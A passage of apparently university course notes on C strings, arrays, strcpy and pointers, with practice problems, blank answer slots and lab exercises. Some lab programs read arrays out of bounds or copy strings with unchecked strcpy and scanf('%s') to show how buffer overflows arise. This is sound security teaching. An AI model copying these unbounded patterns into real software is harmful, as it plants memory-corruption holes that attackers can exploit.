The array named school holds 5 characters: 'N', 'a', 'v', 'y', 0. It is worth noting again that the length of the string "Navy" is 4, but it actually has 5 characters, since the NULL character which appears at the end is actually part of the string. So if you want a string to hold "Navy", it must have space allotted for at least 5 characters.

You may be wondering: Why the zero at the end of the string? What's up with that? The zero at the end tells C when to stop accessing the array!
For example, we have seen many times already that strings are printed to the screen with the %s conversion specifier, as in:

    printf( "Go %s! Beat %s!\n", school, "Army" );

How does printf know when to stop printing out the string named school? As it turns out, printf will print out the first element in the array named school, and then printf will continue to print out characters, one by one, until it reaches the zero (i.e., the NULL).

2.3. Changing the value of a string variable

We can initialize a string variable when it is declared (as in char school[5] = "Navy"; ). But, if we assign a string a value when it is declared, can we change the value later?

With other types, such as int, float and char, you were allowed to assign values to the variables in a manner like this:

    int favorite_number ;
    favorite_number = 7 ;

Unfortunately, assignments cannot be done like this with strings. The code below will not compile:

    char school[5];
    school = "Navy";

So… how can we change the value of a string? There are two ways.

Changing a string value character by character.

We can change the value of a string by changing the values of the individual characters. For example:

    char school[5] = "Navy";
    printf( "%s\n", school );
    school[0] = 'U';
    school[1] = 'S';
    school[2] = 'N';
    school[3] = 'A';
    printf( "%s\n" , school );

Practice Problem 4.4
Continuing the example above, what would happen if we modified two lines of code as shown below?

    school[2] = 'A';
    school[3] = 0 ;
    printf( "%s\n", school );

Solution:

Changing a string value using strcpy

The second way to change a string's value is with the "string copy" function. The syntax is

    strcpy( s1 , s2 );

This function copies the string s2 to the string s1. When the string s2 is copied over the string s1, the strcpy function automatically places a closing NULL at the end of the new (modified) string s1.
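An added example (not from the EC310 notes) that shows, byte by byte, what strcpy leaves behind in a 16-byte array and pairs it with a size-checked copy that refuses a source that will not fit; the function names are constructed for this illustration, and the slogans are the ones used in Security Exercise 4 later in this chapter.

```c
#include <stdio.h>
#include <string.h>
#include <stdbool.h>
#include <stddef.h>

#define SLOGAN_SIZE 16   /* "Cyber 2 is fun!" is 15 characters plus the NULL */

/* Walks an array the way printf("%s") does: counts characters until the
 * first NULL byte. Returns the number of characters that would be printed. */
size_t chars_printf_would_print(const char *s)
{
    size_t n = 0;
    while (s[n] != 0) {
        n++;
    }
    return n;
}

/* Starts from the sx4c.c slogan, runs the strcpy from Part 5 of Security
 * Exercise 4, and returns the byte that ends up at position i of the array
 * (or -1 if i is not a valid index). */
int slogan_byte_after_copy(size_t i)
{
    char slogan[SLOGAN_SIZE] = "Cyber 2 is fun!";

    strcpy(slogan, "Cyber rocks!");   /* writes 12 characters plus a NULL at index 12 */

    if (i >= SLOGAN_SIZE) {
        return -1;
    }
    return (unsigned char)slogan[i];
}

/* Number of characters printf("%s", slogan) shows after the strcpy above. */
size_t slogan_length_after_copy(void)
{
    char slogan[SLOGAN_SIZE] = "Cyber 2 is fun!";

    strcpy(slogan, "Cyber rocks!");
    return chars_printf_would_print(slogan);
}

/* A size-aware replacement for strcpy: copies src (including its NULL) into
 * dst only when the whole thing fits in dst_size bytes. strcpy itself never
 * looks at the destination's size, which is the root of the problem. */
bool copy_string_checked(char *dst, size_t dst_size, const char *src)
{
    size_t needed = strlen(src) + 1;   /* characters plus the closing NULL */

    if (dst_size == 0 || needed > dst_size) {
        return false;                  /* would run past the end of dst */
    }
    memcpy(dst, src, needed);
    return true;
}

/* Reports whether src can be stored in a SLOGAN_SIZE-byte array. */
bool fits_in_slogan(const char *src)
{
    char slogan[SLOGAN_SIZE];

    return copy_string_checked(slogan, sizeof slogan, src);
}

int main(void)
{
    size_t i;

    printf("after strcpy, %zu characters are printed\n", slogan_length_after_copy());
    for (i = 0; i < SLOGAN_SIZE; i++) {
        int b = slogan_byte_after_copy(i);
        printf("slogan[%2zu] = 0x%02x %s\n", i, b, b == 0 ? "(NULL)" : "");
    }
    printf("\"Cyber 2 is fun!\" fits: %d\n", fits_in_slogan("Cyber 2 is fun!"));
    printf("\"Cyber 2 is fun!!\" fits: %d\n", fits_in_slogan("Cyber 2 is fun!!"));
    return 0;
}
```

The byte dump shows that the NULL written by strcpy lands on top of the 'u', so only "n!" survives beyond it, and printf stops at the NULL without ever reaching those bytes.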
To use the function strcpy, you must have the following line at the top of your program:

    #include <string.h>

One final note about strings. When entering strings from the keyboard, don't use the ampersand (&). For example, to enter a midshipman's last name from the keyboard, we would use:

    char mid_name[24] ;
    scanf( "%s" , mid_name );

As an introduction to the dangers inherent in using arrays, you might find it useful to view two videos:

"It came from California… the students were safe… their computers weren't…": https://www.youtube.com/watch?v=fj8S6Hd-5bk

What's that you say? You don't see the danger? Let's watch another video from March 2009 (the first 4 minutes are enough): http://www.cbsnews.com/videos/the-internet-is-infected/

Practice Problem 4.5
We want to write a C program that declares a string (a character array) and initializes it to "Military Academy", prints this string to the screen, then, within the program, changes the string to the name of your favorite college, and then, once again, prints the string to the monitor. Your program output should appear as shown below:

(Screen capture of the expected program output.)

Fill in the three missing lines of code.

Solution:

    #include <stdio.h>
    #include <string.h>

    int main()
    {
        char phrase[] = "Military Academy" ;



    }

Practice Problem 4.6
Answer the questions about the character string in memory shown below, where the first element in the string is 0x53.

(Figure: a character string in memory, beginning with the byte 0x53.)

(a) What is the minimum number of bytes that could have safely been allocated for this string?
(b) Write this declaration, naming the array 'myString'.
(c) What is the address of 'myString[0]'?
(d) What character is at myString[1]?

Solution:
(a)
(b)
(c)
(d)

Practice Problem 4.7
(a) Write the declaration for an array named LuckyNumbers which will hold 6 integers.
Solution:
(b) Complete this statement to display the 4th LuckyNumber:

    printf("The fourth lucky number is %d\n", ________ );

Solution:

    printf("The fourth lucky number is %d\n", ________ );

(c) What happens if I attempt to display LuckyNumbers[9]?
i. Will it return a value?
ii. Will I receive an error message?
iii. Will the program crash?
Solution:
i:
ii:
iii:

Problems

1. To create a variable that contains a letter of the alphabet:
a) What data type will I need to use?
b) What special data structure will group a collection of these letters into a word or sentence?

2. Consider the section of main memory shown below. The address of one of the individual bytes is also shown on the figure. The decimal (base-10) integer value of 150 is stored at address 00003D18.

(Figure: nine bytes of main memory, with the address 00003D18 marked on one of them.)

a) On the picture above, show how the value of 150 would be stored in main memory. Use hexadecimal notation.
b) Annotate the diagram above to show the addresses for each byte in memory that is depicted on the figure (so that all nine bytes have the proper address shown).
c) What would be displayed on the monitor by the command: x/xb 0x00003D18 ?
d) What would be displayed on the monitor by the command: x/xh 0x00003D18 ?
e) What would be displayed on the monitor by the command: x/xw 0x00003D18 ?

3. Move the program char_array2.c from the booksrc directory to your work directory. Run the code with the debugger by entering the seven lines of code shown on page 85 of Chapter 3, EXCEPT instead of the line "break main" use "break 6". This will insert a breakpoint at line 6 (which should correspond to the blank line in the code listing). Thus, you will run the program up to the breakpoint at line 6.
a) In words (a sentence or two), what does this program do?
b) At the breakpoint (where your program stops), what is the value of the instruction pointer?
c) At the breakpoint, what would be the result of entering x/i $eip ?

4. Consider the picture below, where all memory contents are in hexadecimal:

(Figure: registers and a region of memory, with contents shown in hexadecimal.)

a) In words: what is held in the eip register, i.e., what is the purpose of this register? (Your answer should not be: "804838d".)
b) What would be displayed on the monitor by the command: i r eip ?
c) What would be displayed on the monitor by the command: x/xb $eip ?
d) What would be displayed on the monitor by the command: i r esp ?
e) What would be displayed on the monitor by the command: x/xw $esp ?
f) What would be displayed on the monitor by the command: x/xb 0x08048475 ?
g) What would be displayed on the monitor by the command: x/xs 0x08048475 ?

5. What is the fundamental issue with C that makes a buffer overflow exploit possible?

6. Use the array declaration to answer the questions.

    float wins[6] = {3.4,7,4,6.1,9,10};

a) How many bytes are allocated for this array?
b) What value is stored in wins[1]?
c) What value is stored in wins[6]?

7. Let's pretend there are 5 students in EC310. We want to write a C program that declares an array named EC310midterm that will hold the midterm grades for the class. The program should allow the user to enter the midterm grades at runtime, and should then print out the average of the midterm grades. Here is an example of how the program should appear:

(Screen capture of the expected program output.)

Since your EC310 instructors "exist to serve", they have provided you with the source code. Since your EC310 instructors also have a mean streak, they have left several strategic lines of code missing.

    #include <stdio.h>

    int main()
    {
        int num_students = 5;
        float EC310midterm[ ];
        int number;
        float sum = 0;
        float average;

        for ( ; ; )
        {
            printf( "Enter score for student %d : " , number + 1 );
            scanf( "%f" , &EC310midterm[ number ] );
            sum = sum + ;
        }

        average = ;

        printf( "Class midterm average: %f \n" , average );
    }

Enter this program, filling in the correct (missing) lines of code. Run the program to ensure it works correctly. It is recommended that you type this code, rather than cut-and-paste. Turn in a copy of your source code and a screen capture of your program successfully running. (Note: To perform a screen capture, hold down the Control, Alt and PrintScreen keys, all at the same time. This will save a picture of the screen to the clipboard, which you can then paste into an MS Word doc.)

8.
In the program presented in Problem 7 above, if the line of code:

    EC310midterm[5] = 100 ;

was added to the end of the existing code, would the program still compile? If so, describe what we might expect the effect to be.

Security Exercise 4

Part 1: Initial Set-Up

Your instructors have prewritten three of the C programs that you will use for this lab, and have placed them in the ec310code directory. We have done this because we care. (10)

The programs you will use today are named sx4a.c, sx4b.c and sx4c.c, and these three programs are sitting in the ec310code directory. We need to copy these files to the work directory. To copy them from the ec310code directory to the work directory, carefully enter the following at the home directory prompt (make sure you are at your home directory!):

    midshipman@EC310:~ $ cp ec310code/sx4a.c work

Now carefully enter the following two lines at the home directory prompt:

    midshipman@EC310:~ $ cp ec310code/sx4b.c work
    midshipman@EC310:~ $ cp ec310code/sx4c.c work

If all went well, you should have copies of sx4a.c, sx4b.c and sx4c.c in your work directory. Verify that you have sx4a.c, sx4b.c and sx4c.c in your work directory by changing to the work directory:

    cd work

and then listing the files in the work directory:

    ls

If you do not have sx4a.c, sx4b.c and sx4c.c in your work directory, STOP and ask your instructor or lab tech for help. Otherwise, proceed to Part 2.

(10) ECE: The Caring Department.

Part 2: Fun with Navy

(Cartoon caption: "Who am I?")

You should now be in the work directory. Examine the program sx4a.c using nano. The C program is shown below:

    #include <stdio.h>
    #include <string.h>

    int main( )
    {
        char school[ 5 ] ;

        school[ 0 ] = 'N' ;
        school[ 1 ] = 'a' ;
        school[ 2 ] = 'v' ;
        school[ 3 ] = 'y' ;
        school[ 4 ] = 0 ;

        printf( "%s\n" , school );
    }

Save your program (Control-o) and exit nano (Control-x), and then compile your program using

    gcc -g sx4a.c

and then run your program

    ./a.out

to confirm it executes as expected.
If your program is not working, STOP and ask your instructor for help. Otherwise, proceed to Part 3.

Part 3: Wa?

Now, using nano, change the line

    char school[ 5 ] ;

to read

    char school[ 10 ] ;

and rerun your program.

Question 1: What effect did this modification have on your program's output? Explain.

Now, we would like to modify our program so that it prints out Wavy instead of Navy. Change one line of code in your program to accomplish this. Do not use strcpy for this question. Verify your solution works.

Question 2: What change did you make to your program?

Now change the line

    school[ 2 ] = 'v' ;

to read

    school[ 2 ] = 0 ;

(Note that the line of code contains the number zero, not the letter oh.)

Question 3: What output is produced? Why is this output produced?

Now, change the line

    school[ 2 ] = 0 ;

back to its original form:

    school[ 2 ] = 'v' ;

but change the array declaration line

    char school[ 10 ] ;

to read instead:

    char school[ 2 ] ;

So, we are telling C that we intend that our character string only have two characters (and remember, one of them should be the NULL character). Run the program.

Question 4: What was printed out? Did the program realize you only wanted the array to have two items? Explain.

If you feel very confident in your answer to Question 4, go on to Part 4. Otherwise, STOP and ask your instructor for help.

Part 4: Out of Bounds

Examine the program sx4b.c using nano. The C program is shown below:

    #include <stdio.h>
    #include <string.h>

    int main()
    {
        int count[3] = { 1 , 2 , 3 };
        int j;

        for ( j = 1 ; j <= 3 ; j = j + 1 )
        {
            printf("The next number is %d\n" , count[j] );
        }
    }

Compile and run the program.

Question 5: What was printed out? Explain.

Question 6: How would you fix the program so that it prints out:

    The next number is 1
    The next number is 2
    The next number is 3

Make this fix to your code and have your instructor verify that your program works properly. After you have Question 6 signed off, proceed to Part 5.
UNIX Tips and Tricks

UNIX provides another feature to lessen the amount of typing that busy midshipmen have to perform. UNIX attempts to complete our commands for us, using a feature called tab completion. To use tab completion, you type in part of a command, and then hit the Tab key. UNIX will attempt to complete the command for you (or may partially complete the command). For example, suppose I have been editing the file smith_4_1.c, and have opened and closed this file several times already. If I now type:

    midshipman@EC310-VM:~ $ nano s

and then hit the Tab key, UNIX will automatically complete the command for me:

    midshipman@EC310-VM:~ $ nano smith_4_1.c

Similarly, I find that if I type

    midshipman@EC310-VM:~ $ ./a

and then hit the Tab key, UNIX will automatically complete the command for me:

    midshipman@EC310-VM:~ $ ./a.out

Tab completion is very useful. Keep in mind that if UNIX cannot decide how to complete your command (since you have not provided enough characters to start with), enter another character or two and press Tab again.

Part 5: Joys of strcpy

Examine the program sx4c.c using nano. The C program is shown below:

    #include <stdio.h>
    #include <string.h>

    int main()
    {
        char slogan[16] = "Cyber 2 is fun!" ;

        printf("\n%s\n\n" , slogan );
    }

Compile and run the program.

Question 7: Why did I choose to make the array size equal to 16? There are only 15 characters in the string Cyber 2 is fun!

Carefully add the following two lines to your program above, right before the closing brace.

    strcpy( slogan , "Cyber rocks!" );
    printf("\n%s\n\n" , slogan );

Compile and run the program.

Question 8: What was printed out? Explain.

Your friend is confused. He looks at the length of the two strings:

    C y b e r   2   i s   f u n !
    - - - - - - - - - - - - - - -
    C y b e r   r o c k s !

and wonders why the second item printed out wasn't Cyber rocks!un!. In other words, he wonders what happened to the un!
that finished the string Cyber 2 is fun!, since those last few characters were not overwritten.

Question 9: What is the answer to your friend's question? Explain.

Security Exercise 4 Answer Sheet

Name: ____________________

Question 1:

Question 2:

Question 3:

Question 4:

Question 5:

Question 6:    __________________________ Instructor/Lab Tech signature

Question 7:

Question 8:

Question 9:

Chapter 5: Intro to Pointers

Objectives:
(a) Explain the operation of the address operator.
(b) Describe the relationships that exist between pointers, arrays and strings.
(c) Differentiate between the value of a pointer and the address of a pointer.

Let me give you some pointers for passing EC310: 0x0335a438 0x0826d210 0x0447ab36. Ha ha ha ha ... ha... er... ha?

1. Pointers

1.1. Why Use Pointers?

Consider your favorite database: MIDS. Suppose you tell the registrar that you want to register for the following courses:

    HU222: Football Theory
    HH333: History of Embarrassing Air Force Scandals
    FP444: Cicero's Impact on Renaissance Poetry as Developed for Theatre circa 1700
    EC310: Cyber Security II

Now, other people also have to use (and possibly modify) your record in the MIDS database. Your advisor has to check that you are on track for your major. Your instructors have to enter grades into your record. The Dean may have to annotate your matrix with a note saying that one course counts for another course. Various people may have to enter conduct offenses.

So, let's say that it comes time for your HU222 instructor to enter your six-week grade. How can this be accomplished? Recall that the MIDS database, as with everything else a computer uses, resides in memory. One option would be for the registrar to send your HU222 instructor a copy of the entire MIDS database, with a note: "Update the database, and then send it back to me." This involves the duplication and movement of vast amounts of data. Can you think of a better way?
A better way would be to let the instructor modify the actual database, not a copy of the database. But how can that be done? Suppose your instructor was given the address of the MIDS database in memory. Then, any changes made to the contents of a memory location are actual changes to the MIDS database! In other words, instead of sending someone the MIDS database, we simply tell them: "Here is the address of the MIDS database, go make your changes directly."

1.2. Addresses

Recall from week one of the course that all variables have

    a type
    a name (also called an identifier)
    a value (possibly a garbage value)
    an address

We will focus on this notion of a variable's address. Addresses are 4 bytes (32 bits) long. Since people don't like reading 32-bit binary numbers...

    Hey! I like reading 32-bit binary numbers!!!

CORRECTION... since most people don't like reading 32-bit binary numbers, the shorthand hexadecimal notation is used. As mentioned previously, memory locations are usually given in hexadecimal notation.

Practice Problem 5.1

If the first byte of a variable is stored at memory location numbered:

    00000000000100101111111101111100

what is this address in hexadecimal notation?

Solution: 0000 0000 0001 0010 1111 1111 0111 1100

Practice Problem 5.2

For our x86 architecture, how many hexadecimal digits are in an address?

Solution:

1.3. The address operator &

& (the ampersand sign) is the address operator, which is used to access the address of a variable. &variable returns the address of variable. So, if we have a variable named y, then &y returns the address of y. To examine how the ampersand operator behaves, consider the program below, along with its associated output. Recall: %d is used for integers; %x is used for hexadecimal.

    #include<stdio.h>
    int main()
    {
        int current_year = 2014;
        printf("\nThe year is %d and the address is %x \n" , current_year , &current_year );
    }

1.4.
Assigning Values to Pointers

A pointer is a variable that holds a memory address, usually the address of another variable. Put another way, a pointer is a data type that holds the hexadecimal address of another variable. Put a third way: A pointer variable "points to" another variable. A pointer variable is itself stored in 4 bytes.

Declaring Pointers

A pointer variable is declared by using the asterisk. For example, the declaration

    data_type *pointer_name ;

means: "I am declaring a pointer named pointer_name that will point to another variable of type data_type". For example, consider the declaration

    float *a_ptr ;

What does this mean? It means that we have told C that we would like to have a pointer variable named a_ptr that will be used to point to some float variable (but it does not point anywhere yet!).

Assigning Values to Pointers

Recall that a pointer variable holds an address. To assign the correct address to a pointer variable, we use the & operator (the address operator). Let's consider the code snippet below:

    int a = 131;
    int *a_ptr ;
    a_ptr = &a;

Let's look at this code snippet line-by-line.

The very first line (int a = 131;) tells the compiler that you want to use a variable named a, of type integer, that will be initialized to the value of 131. The compiler will place the value of a on the program's stack (recall that the stack is the section of memory that a program has available to hold its variables and any other data it needs to perform its operation). The operating system (not you, the programmer) will decide the precise address of where the variable a will be placed. Let's presume that the compiler has chosen to store the variable a at address 0056DE73.

The second line of code (int *a_ptr;) tells the compiler that you want to use a pointer variable named a_ptr, that will (at some time later in its life) point to a variable of type int. This variable must also be stored on the stack.
Let's presume that the compiler has chosen to store the variable a_ptr at address 0056DA61.

Finally, the third line of code (a_ptr = &a;) places the address of a into the variable a_ptr.

Practice Problem 5.3

Consider the program shown below, along with its corresponding output.

    #include<stdio.h>
    int main()
    {
        int a = 4;
        int *a_ptr;
        a_ptr = &a;
        printf("\nThe value of a is %d and the address is %x \n" , a , &a );
        printf("\nThe value of a_ptr is %x and the address is %x \n\n" , a_ptr , &a_ptr ) ;
    }

In the picture shown below:
(a) Fill in the two red circles.
(b) Draw an arrow showing where a_ptr is stored on the stack.
(c) Annotate the figure to show the value of a_ptr.

Pointers are confusing! Some argue that pointers are the greatest source of bugs in C programs. In fact, some modern programming languages (such as Java) have eliminated pointers altogether since pointers are so confusing and lead to so many errors. But it is precisely because pointers are confusing that leads to their use by adversaries. Almost all program attacks involve the use or abuse of a pointer. The Morris worm... Conficker... Stuxnet... these all employ a buffer overflow attack. The key to understanding this attack involves understanding pointers.

1.5. Arrays and Pointers

Recall our discussion of arrays from last lecture. We mentioned that if we declare an array with

    float pay[4];

the compiler will reserve four consecutive memory locations, each of which will hold a float variable. The four variables are pay[0], pay[1], pay[2] and pay[3]. The array of all four variables is named pay. Recall also that in the C programming language, strings—i.e., sequences of characters—are stored as arrays of characters.
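The following program is an added example for Sections 1.3 to 1.5 (it is not from the course notes or the lab files) that exercises the address operator, pointer assignment and the array-name-is-a-pointer rule together, and shows why "give them the address" from Section 1.1 works: writing through a pointer changes the original variable. The functions store_through, modify_via_pointer, array_name_is_first_element and element_stride_bytes are this example's own names.

```c
#include <stdio.h>

/* Write a new value through a pointer. The caller's variable changes,
 * because the pointer holds the variable's address, not a copy of it. */
void store_through(int *target, int value)
{
    *target = value;
}

/* Returns 1 when a variable is changed through a pointer to it. */
int modify_via_pointer(void)
{
    int a = 131;
    int *a_ptr = &a;          /* a_ptr now holds the address of a */
    store_through(a_ptr, 7);  /* nobody assigns to a directly ... */
    return a == 7;            /* ... yet a is now 7 */
}

/* Returns 1 when the array name and &arr[0] hold the same address. */
int array_name_is_first_element(void)
{
    int pay[4] = { 10, 20, 30, 40 };
    int *p = pay;             /* no & needed: pay already is an address */
    return (p == &pay[0]) && (*p == 10) && (*(p + 2) == pay[2]);
}

/* Pointer arithmetic moves in units of the pointed-to type: p + 1 is
 * the next int, so the two addresses differ by sizeof(int) bytes. */
size_t element_stride_bytes(void)
{
    int pay[4] = { 0 };
    int *p = pay;
    return (size_t)((char *)(p + 1) - (char *)p);
}

int main(void)
{
    int current_year = 2014;
    int *year_ptr = &current_year;

    /* %p is the specifier defined for printing an address. The notes use
     * %x, which works on the 32-bit lab machine but is not guaranteed
     * elsewhere, so %p is used here. */
    printf("current_year = %d, stored at %p\n",
           current_year, (void *)&current_year);
    printf("year_ptr holds %p and is itself stored at %p\n",
           (void *)year_ptr, (void *)&year_ptr);
    printf("*year_ptr = %d (the value read through the pointer)\n", *year_ptr);

    printf("changed through pointer: %d\n", modify_via_pointer());
    printf("array name == &arr[0]:   %d\n", array_name_is_first_element());
    printf("int stride = %zu bytes\n", element_stride_bytes());
    return 0;
}
```

The two addresses printed for year_ptr make the distinction in Objective (c) concrete: the first is the pointer's value (where current_year lives), the second is the pointer's own address (where the pointer lives).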
Here is an example of declaring a string variable using a character array:

    char school[20] = "US Naval Academy";

The array named school holds 17 characters:

    school[0]  = 'U'
    school[1]  = 'S'
    school[2]  = ' '
    school[3]  = 'N'
    etc., etc.,
    school[16] = 0

So... we can see what school[1] is (it's a character... the character 'S' to be exact), but what exactly is the array name school by its lonesome... without an index? Let's see!

    #include<stdio.h>
    int main()
    {
        char school[20] = "US Naval Academy" ;
        printf("\nThe value of school is %x \n\n" , school ) ;
    }

We have output an address... school was holding an address... school is a pointer. The bottom line is:

    An array name is a pointer!

When we declare an array, C generates a pointer, which is assigned the address of the first element of the array. Consider the declaration

    int a [4];

What really happens is:

    int *a = &a[0];

(Footnote 11: It should be pointed out that this is not a line of valid C code.)

[Figure: a points to a[0]; a[1], a[2] and a[3] follow it in memory.]

For strings, we can tell C to print out a string by using the array name and the string format specifier. If we changed our program to:

    #include<stdio.h>
    int main()
    {
        char school[20] = "US Naval Academy" ;
        printf("\nThe value of school is %s \n\n" , school ) ;
    }

(Only change! The old x is changed to an s.) then the output would be the string itself.

Practice Problem 5.4

Recall that in RAM you have stored the machine language code for your program as well as additional memory allocated for your variables within the program. This latter additional memory is called the stack. You type into the debugger the command

    i r ebp

and get the result 0xbffff818. The register ebp points to the "bottom" of the stack. Upon further review of the assembly code you determine that two strings are stored in memory, one at address ebp-40 and the other at ebp-24. (Note that the numbers 40 and 24 are ordinary base-10 numbers, not base-16.) What are the two hidden words?

Solution: [Stack diagram not reproduced; ebp holds bffff818.]
(Footnote 11, continued: Our meaning is to convey: It's as if this happened...)

Practice Problem 5.5

A large program contains the following lines of code

    int a = 11;
    int b[2];
    b[0] = 10;
    b[1] = 6;

A section of this program's stack is shown below.

    Address       Data
    0xBFFFF8F0    0x3E
    0xBFFFF8F1    0x3F
    0xBFFFF8F2    0x4A
    0xBFFFF8F3    0x0A
    0xBFFFF8F4    0x00
    0xBFFFF8F5    0x00
    0xBFFFF8F6    0x00
    0xBFFFF8F7    0x06
    0xBFFFF8F8    0x00
    0xBFFFF8F9    0x00
    0xBFFFF8FA    0x00
    0xBFFFF8FB    0x0B
    0xBFFFF8FC    0x00
    0xBFFFF8FD    0x00
    0xBFFFF8FE    0x00
    0xBFFFF8FF    0x4D
    0xBFFFF900    0x08
    0xBFFFF901    0x2C
    0xBFFFF902    0x33

What would be the result of the statement:

    printf("The address of array b is %x \n", b);

Solution:

Practice Problem 5.6

Recall that in RAM you have stored the object code for your program as well as additional memory allocated for your variables within the program. You type into the debugger the command:

    i r ebp

and get the result 0xbffff810. Upon further review of the assembly code you determine that two integers are stored in memory, one at address ebp-8 and the other at ebp+4. What are the hidden decimal numbers?

An Aside

Why does scanf sometimes require an ampersand in front of the variable's name and sometimes not? Recall that scanf is another name for the keyboard. When the writers of the C programming language designed the scanf statement, the intent was that the item into which the keyboard input is placed would be provided as an address. What does that mean? That means that when we have a scanf statement, such as

    scanf("%f" , &year_number );

the place where we deposit the keyboard input (the second argument, highlighted in red in the original figure) must be an address. That is simply the way the C language was written. So if we declare a variable of, say, type float as in

    float EC310_torture_factor ;

and we want to read in the value of the EC310_torture_factor from the keyboard, we cannot do this:

    scanf("%f" , EC310_torture_factor );      /* Error! Bad! */
The reason we cannot do this is because EC310_torture_factor is not an address, and the scanf statement always expects that you will provide it an address into which to deposit the keyboard input. So, we can place the value read in from the keyboard into the variable EC310_torture_factor by providing the address of EC310_torture_factor using the address operator:

    scanf("%f" , &EC310_torture_factor );     /* Correct! Good! */

Knowing how the scanf statement was designed should provide insight into how strings are entered from the keyboard. Last lecture we mentioned that when entering strings from the keyboard, you don't use the ampersand: &. For example, to enter a midshipman's last name from the keyboard, we would use:

    char mid_name[24] ;
    scanf( "%s" , mid_name );

Note: No ampersand in front of mid_name!

The reason: Recall from Section 1.5 above that an array name is a pointer—when we declare an array, C generates a pointer, which is assigned the address of the first element of the array. So, in this particular case, mid_name is an address already, so we do not add the ampersand!

OPTIONAL: For your reading and viewing pleasure, here is an example of a "buffer overflow attack". We will discuss the buffer overflow in greater detail, but for now, let's just watch a pre-Snowden video: http://www.cbsnews.com/video/watch/?id=7400904n (first 6-7 minutes)

Problems

1. Examine the program char_array.c which already exists in the booksrc directory.
(a) How does a program know it has reached the end of a string?
(b) How many more characters could legitimately fit into this particular string?

2. Given the string declaration below, mark each strcpy() function call as Safe (S) if the string literal can be safely stored in the array, or Unsafe (U) if the string literal cannot be stored safely in the array. The array is declared as:

    char President[8];

(a) strcpy( President , "Monroe\n");
(b) strcpy( President , "Polk\t");
(c) strcpy( President , "Cleveland\n");
(d) strcpy( President , "Garfield");

3. Given the following variable declarations:

    int foo;
    char *bar;

and the following memory layout (all values in hexadecimal and little endian):

    Address     Contents (4 bytes, lowest address first)
    080483A0    42 52 41 56
    080483A4    4F 21 00 00
    080483A8    A0 83 04 08      bar
    080483AC    05 DB 66 72      foo

What is the value of:
(a) &foo (in hex)
(b) foo (in decimal)
(c) bar (in hex)
(d) &bar (in hex)
(e) If we were to print out the string named bar what would be printed out?

4. Given the following declarations, what would be the C statement to assign ptr_age the address of the integer age? (Circle the correct answer)

    int age;
    int *ptr_age;

(a) &ptr_age = &age;
(b) *ptr_age = &age;
(c) &ptr_age = *age;
(d) ptr_age = age;
(e) ptr_age = &age;

5. Given the following C snippet, what would the output of the printf statement be?

    char name[40] = "LCDR Atwood";
    char *ptr1;
    char *ptr2;
    ptr1 = name;
    ptr2 = ptr1 + 6;
    strcpy(ptr2, "good day by all!");
    printf("My teacher is %s\n", name);

Security Exercise 5

Part 1: Initial Setup (Who am I?)

Your instructors have prewritten two C programs that you will use for this lab, and have placed them in the ec310code directory. The two programs you will use today are named sx5a.c and sx5b.c. Copy these two files from the ec310code directory to the work directory by carefully entering the following two lines at the home directory prompt (make sure you are at your home directory when you enter these!):

    midshipman@EC310:~ $ cp ec310code/sx5a.c work
    midshipman@EC310:~ $ cp ec310code/sx5b.c work

If all went well, you should have copies of sx5a.c and sx5b.c in your work directory. Verify that you have sx5a.c and sx5b.c in your work directory by changing to the work directory:

    cd work

and then listing the files in the work directory:

    ls

If you do not have sx5a.c and sx5b.c in your work directory STOP and ask your instructor or lab tech for help. Otherwise, proceed to Part 2.
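Security Exercise 4 Part 5 and Problems 2 and 5 above all come down to one question strcpy never asks: is there room for the whole string, terminator included, at the place the copy starts? The program below is an added example (not course code) that asks it first, and also shows what happens to the bytes beyond the new terminator when a shorter string replaces a longer one. The names bounded_copy, bounded_copy_at and bytes_after_terminator, and all the sample strings, are this example's own; the strings deliberately differ from those in the problems.

```c
#include <stdio.h>
#include <string.h>

/* Copy src into dst only if the whole string, including its terminating
 * '\0', fits in the cap bytes that dst owns. Returns 0 on success and
 * -1 (leaving dst untouched) when the copy would run off the end of the
 * array. This is precisely the check that strcpy does not perform. */
int bounded_copy(char *dst, size_t cap, const char *src)
{
    size_t need = strlen(src) + 1;      /* +1 for the terminator */
    if (need > cap)
        return -1;
    memcpy(dst, src, need);
    return 0;
}

/* Same check for a copy that starts at byte offset off inside a buffer
 * of cap bytes (the ptr2 = ptr1 + 6 situation in Problem 5): the room
 * left over is cap - off, not cap. */
int bounded_copy_at(char *buf, size_t cap, size_t off, const char *src)
{
    if (off >= cap)
        return -1;
    return bounded_copy(buf + off, cap - off, src);
}

/* Number of bytes in the buffer that lie beyond the first '\0'. After a
 * shorter string is copied over a longer one these still hold the old
 * characters, but %s stops at the terminator and never shows them. */
size_t bytes_after_terminator(const char *buf, size_t cap)
{
    size_t len = 0;
    while (len < cap && buf[len] != '\0')
        len++;
    return (len < cap) ? cap - len - 1 : 0;
}

int main(void)
{
    /* Constructed data sized like the lab: 16 bytes for a 15-char string. */
    char slogan[16] = "Cyber 2 is fun!";

    /* A shorter string replaces it: the old tail survives past the '\0'. */
    bounded_copy(slogan, sizeof slogan, "Cyber rocks!");
    printf("%s   (%zu old bytes remain after the terminator)\n",
           slogan, bytes_after_terminator(slogan, sizeof slogan));
    printf("slogan[13] still holds '%c'\n", slogan[13]);

    /* A longer string is refused instead of being written past the array. */
    if (bounded_copy(slogan, sizeof slogan, "Cyber security is fun!") != 0)
        printf("refused: 23 bytes needed, only %zu available\n", sizeof slogan);

    /* Copying into the middle of a buffer through an offset. */
    char name[16] = "ENS Example";
    if (bounded_copy_at(name, sizeof name, 4, "Jones") == 0)
        printf("%s\n", name);
    if (bounded_copy_at(name, sizeof name, 4, "Longfellowship") != 0)
        printf("refused: only %zu bytes of room at offset 4\n", sizeof name - 4);
    return 0;
}
```

Notice that the capacity passed in is always the size of the array, never the length of whatever string happens to be in it; the array does not shrink when its contents do.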
Part 2: Go Navy

You should now be in the work directory. Examine the program sx5a.c using nano. The C program is shown below:

    #include<stdio.h>
    #include<string.h>
    int main( )
    {
        char phrase[ 10 ] = "Go Navy!" ;
        printf( "%s\n" , phrase );
    }

Save your program (Control-o) and exit nano (Control-x), then compile your program using

    gcc -g sx5a.c

and then run your program:

    ./a.out

If your program is not working as expected STOP and ask your instructor for help. Otherwise, proceed to Part 3.

Part 3: Memory

The array named phrase is a string, and the contents of this string are stored in main memory on the program's stack. We would like to determine the starting address of the string. By using nano, change only a single character in the statement

    printf( "%s\n" , phrase );

to determine the main memory address of where the string named phrase begins. Compile and execute your program.

Question 1: What was the single character you changed?

Question 2: How many bytes of memory are required to hold a single character?

Question 3: Looking at your source code, what character should be stored at phrase[ 1 ]?

Question 4: Looking at your source code, what character should be stored at phrase[ 8 ]?

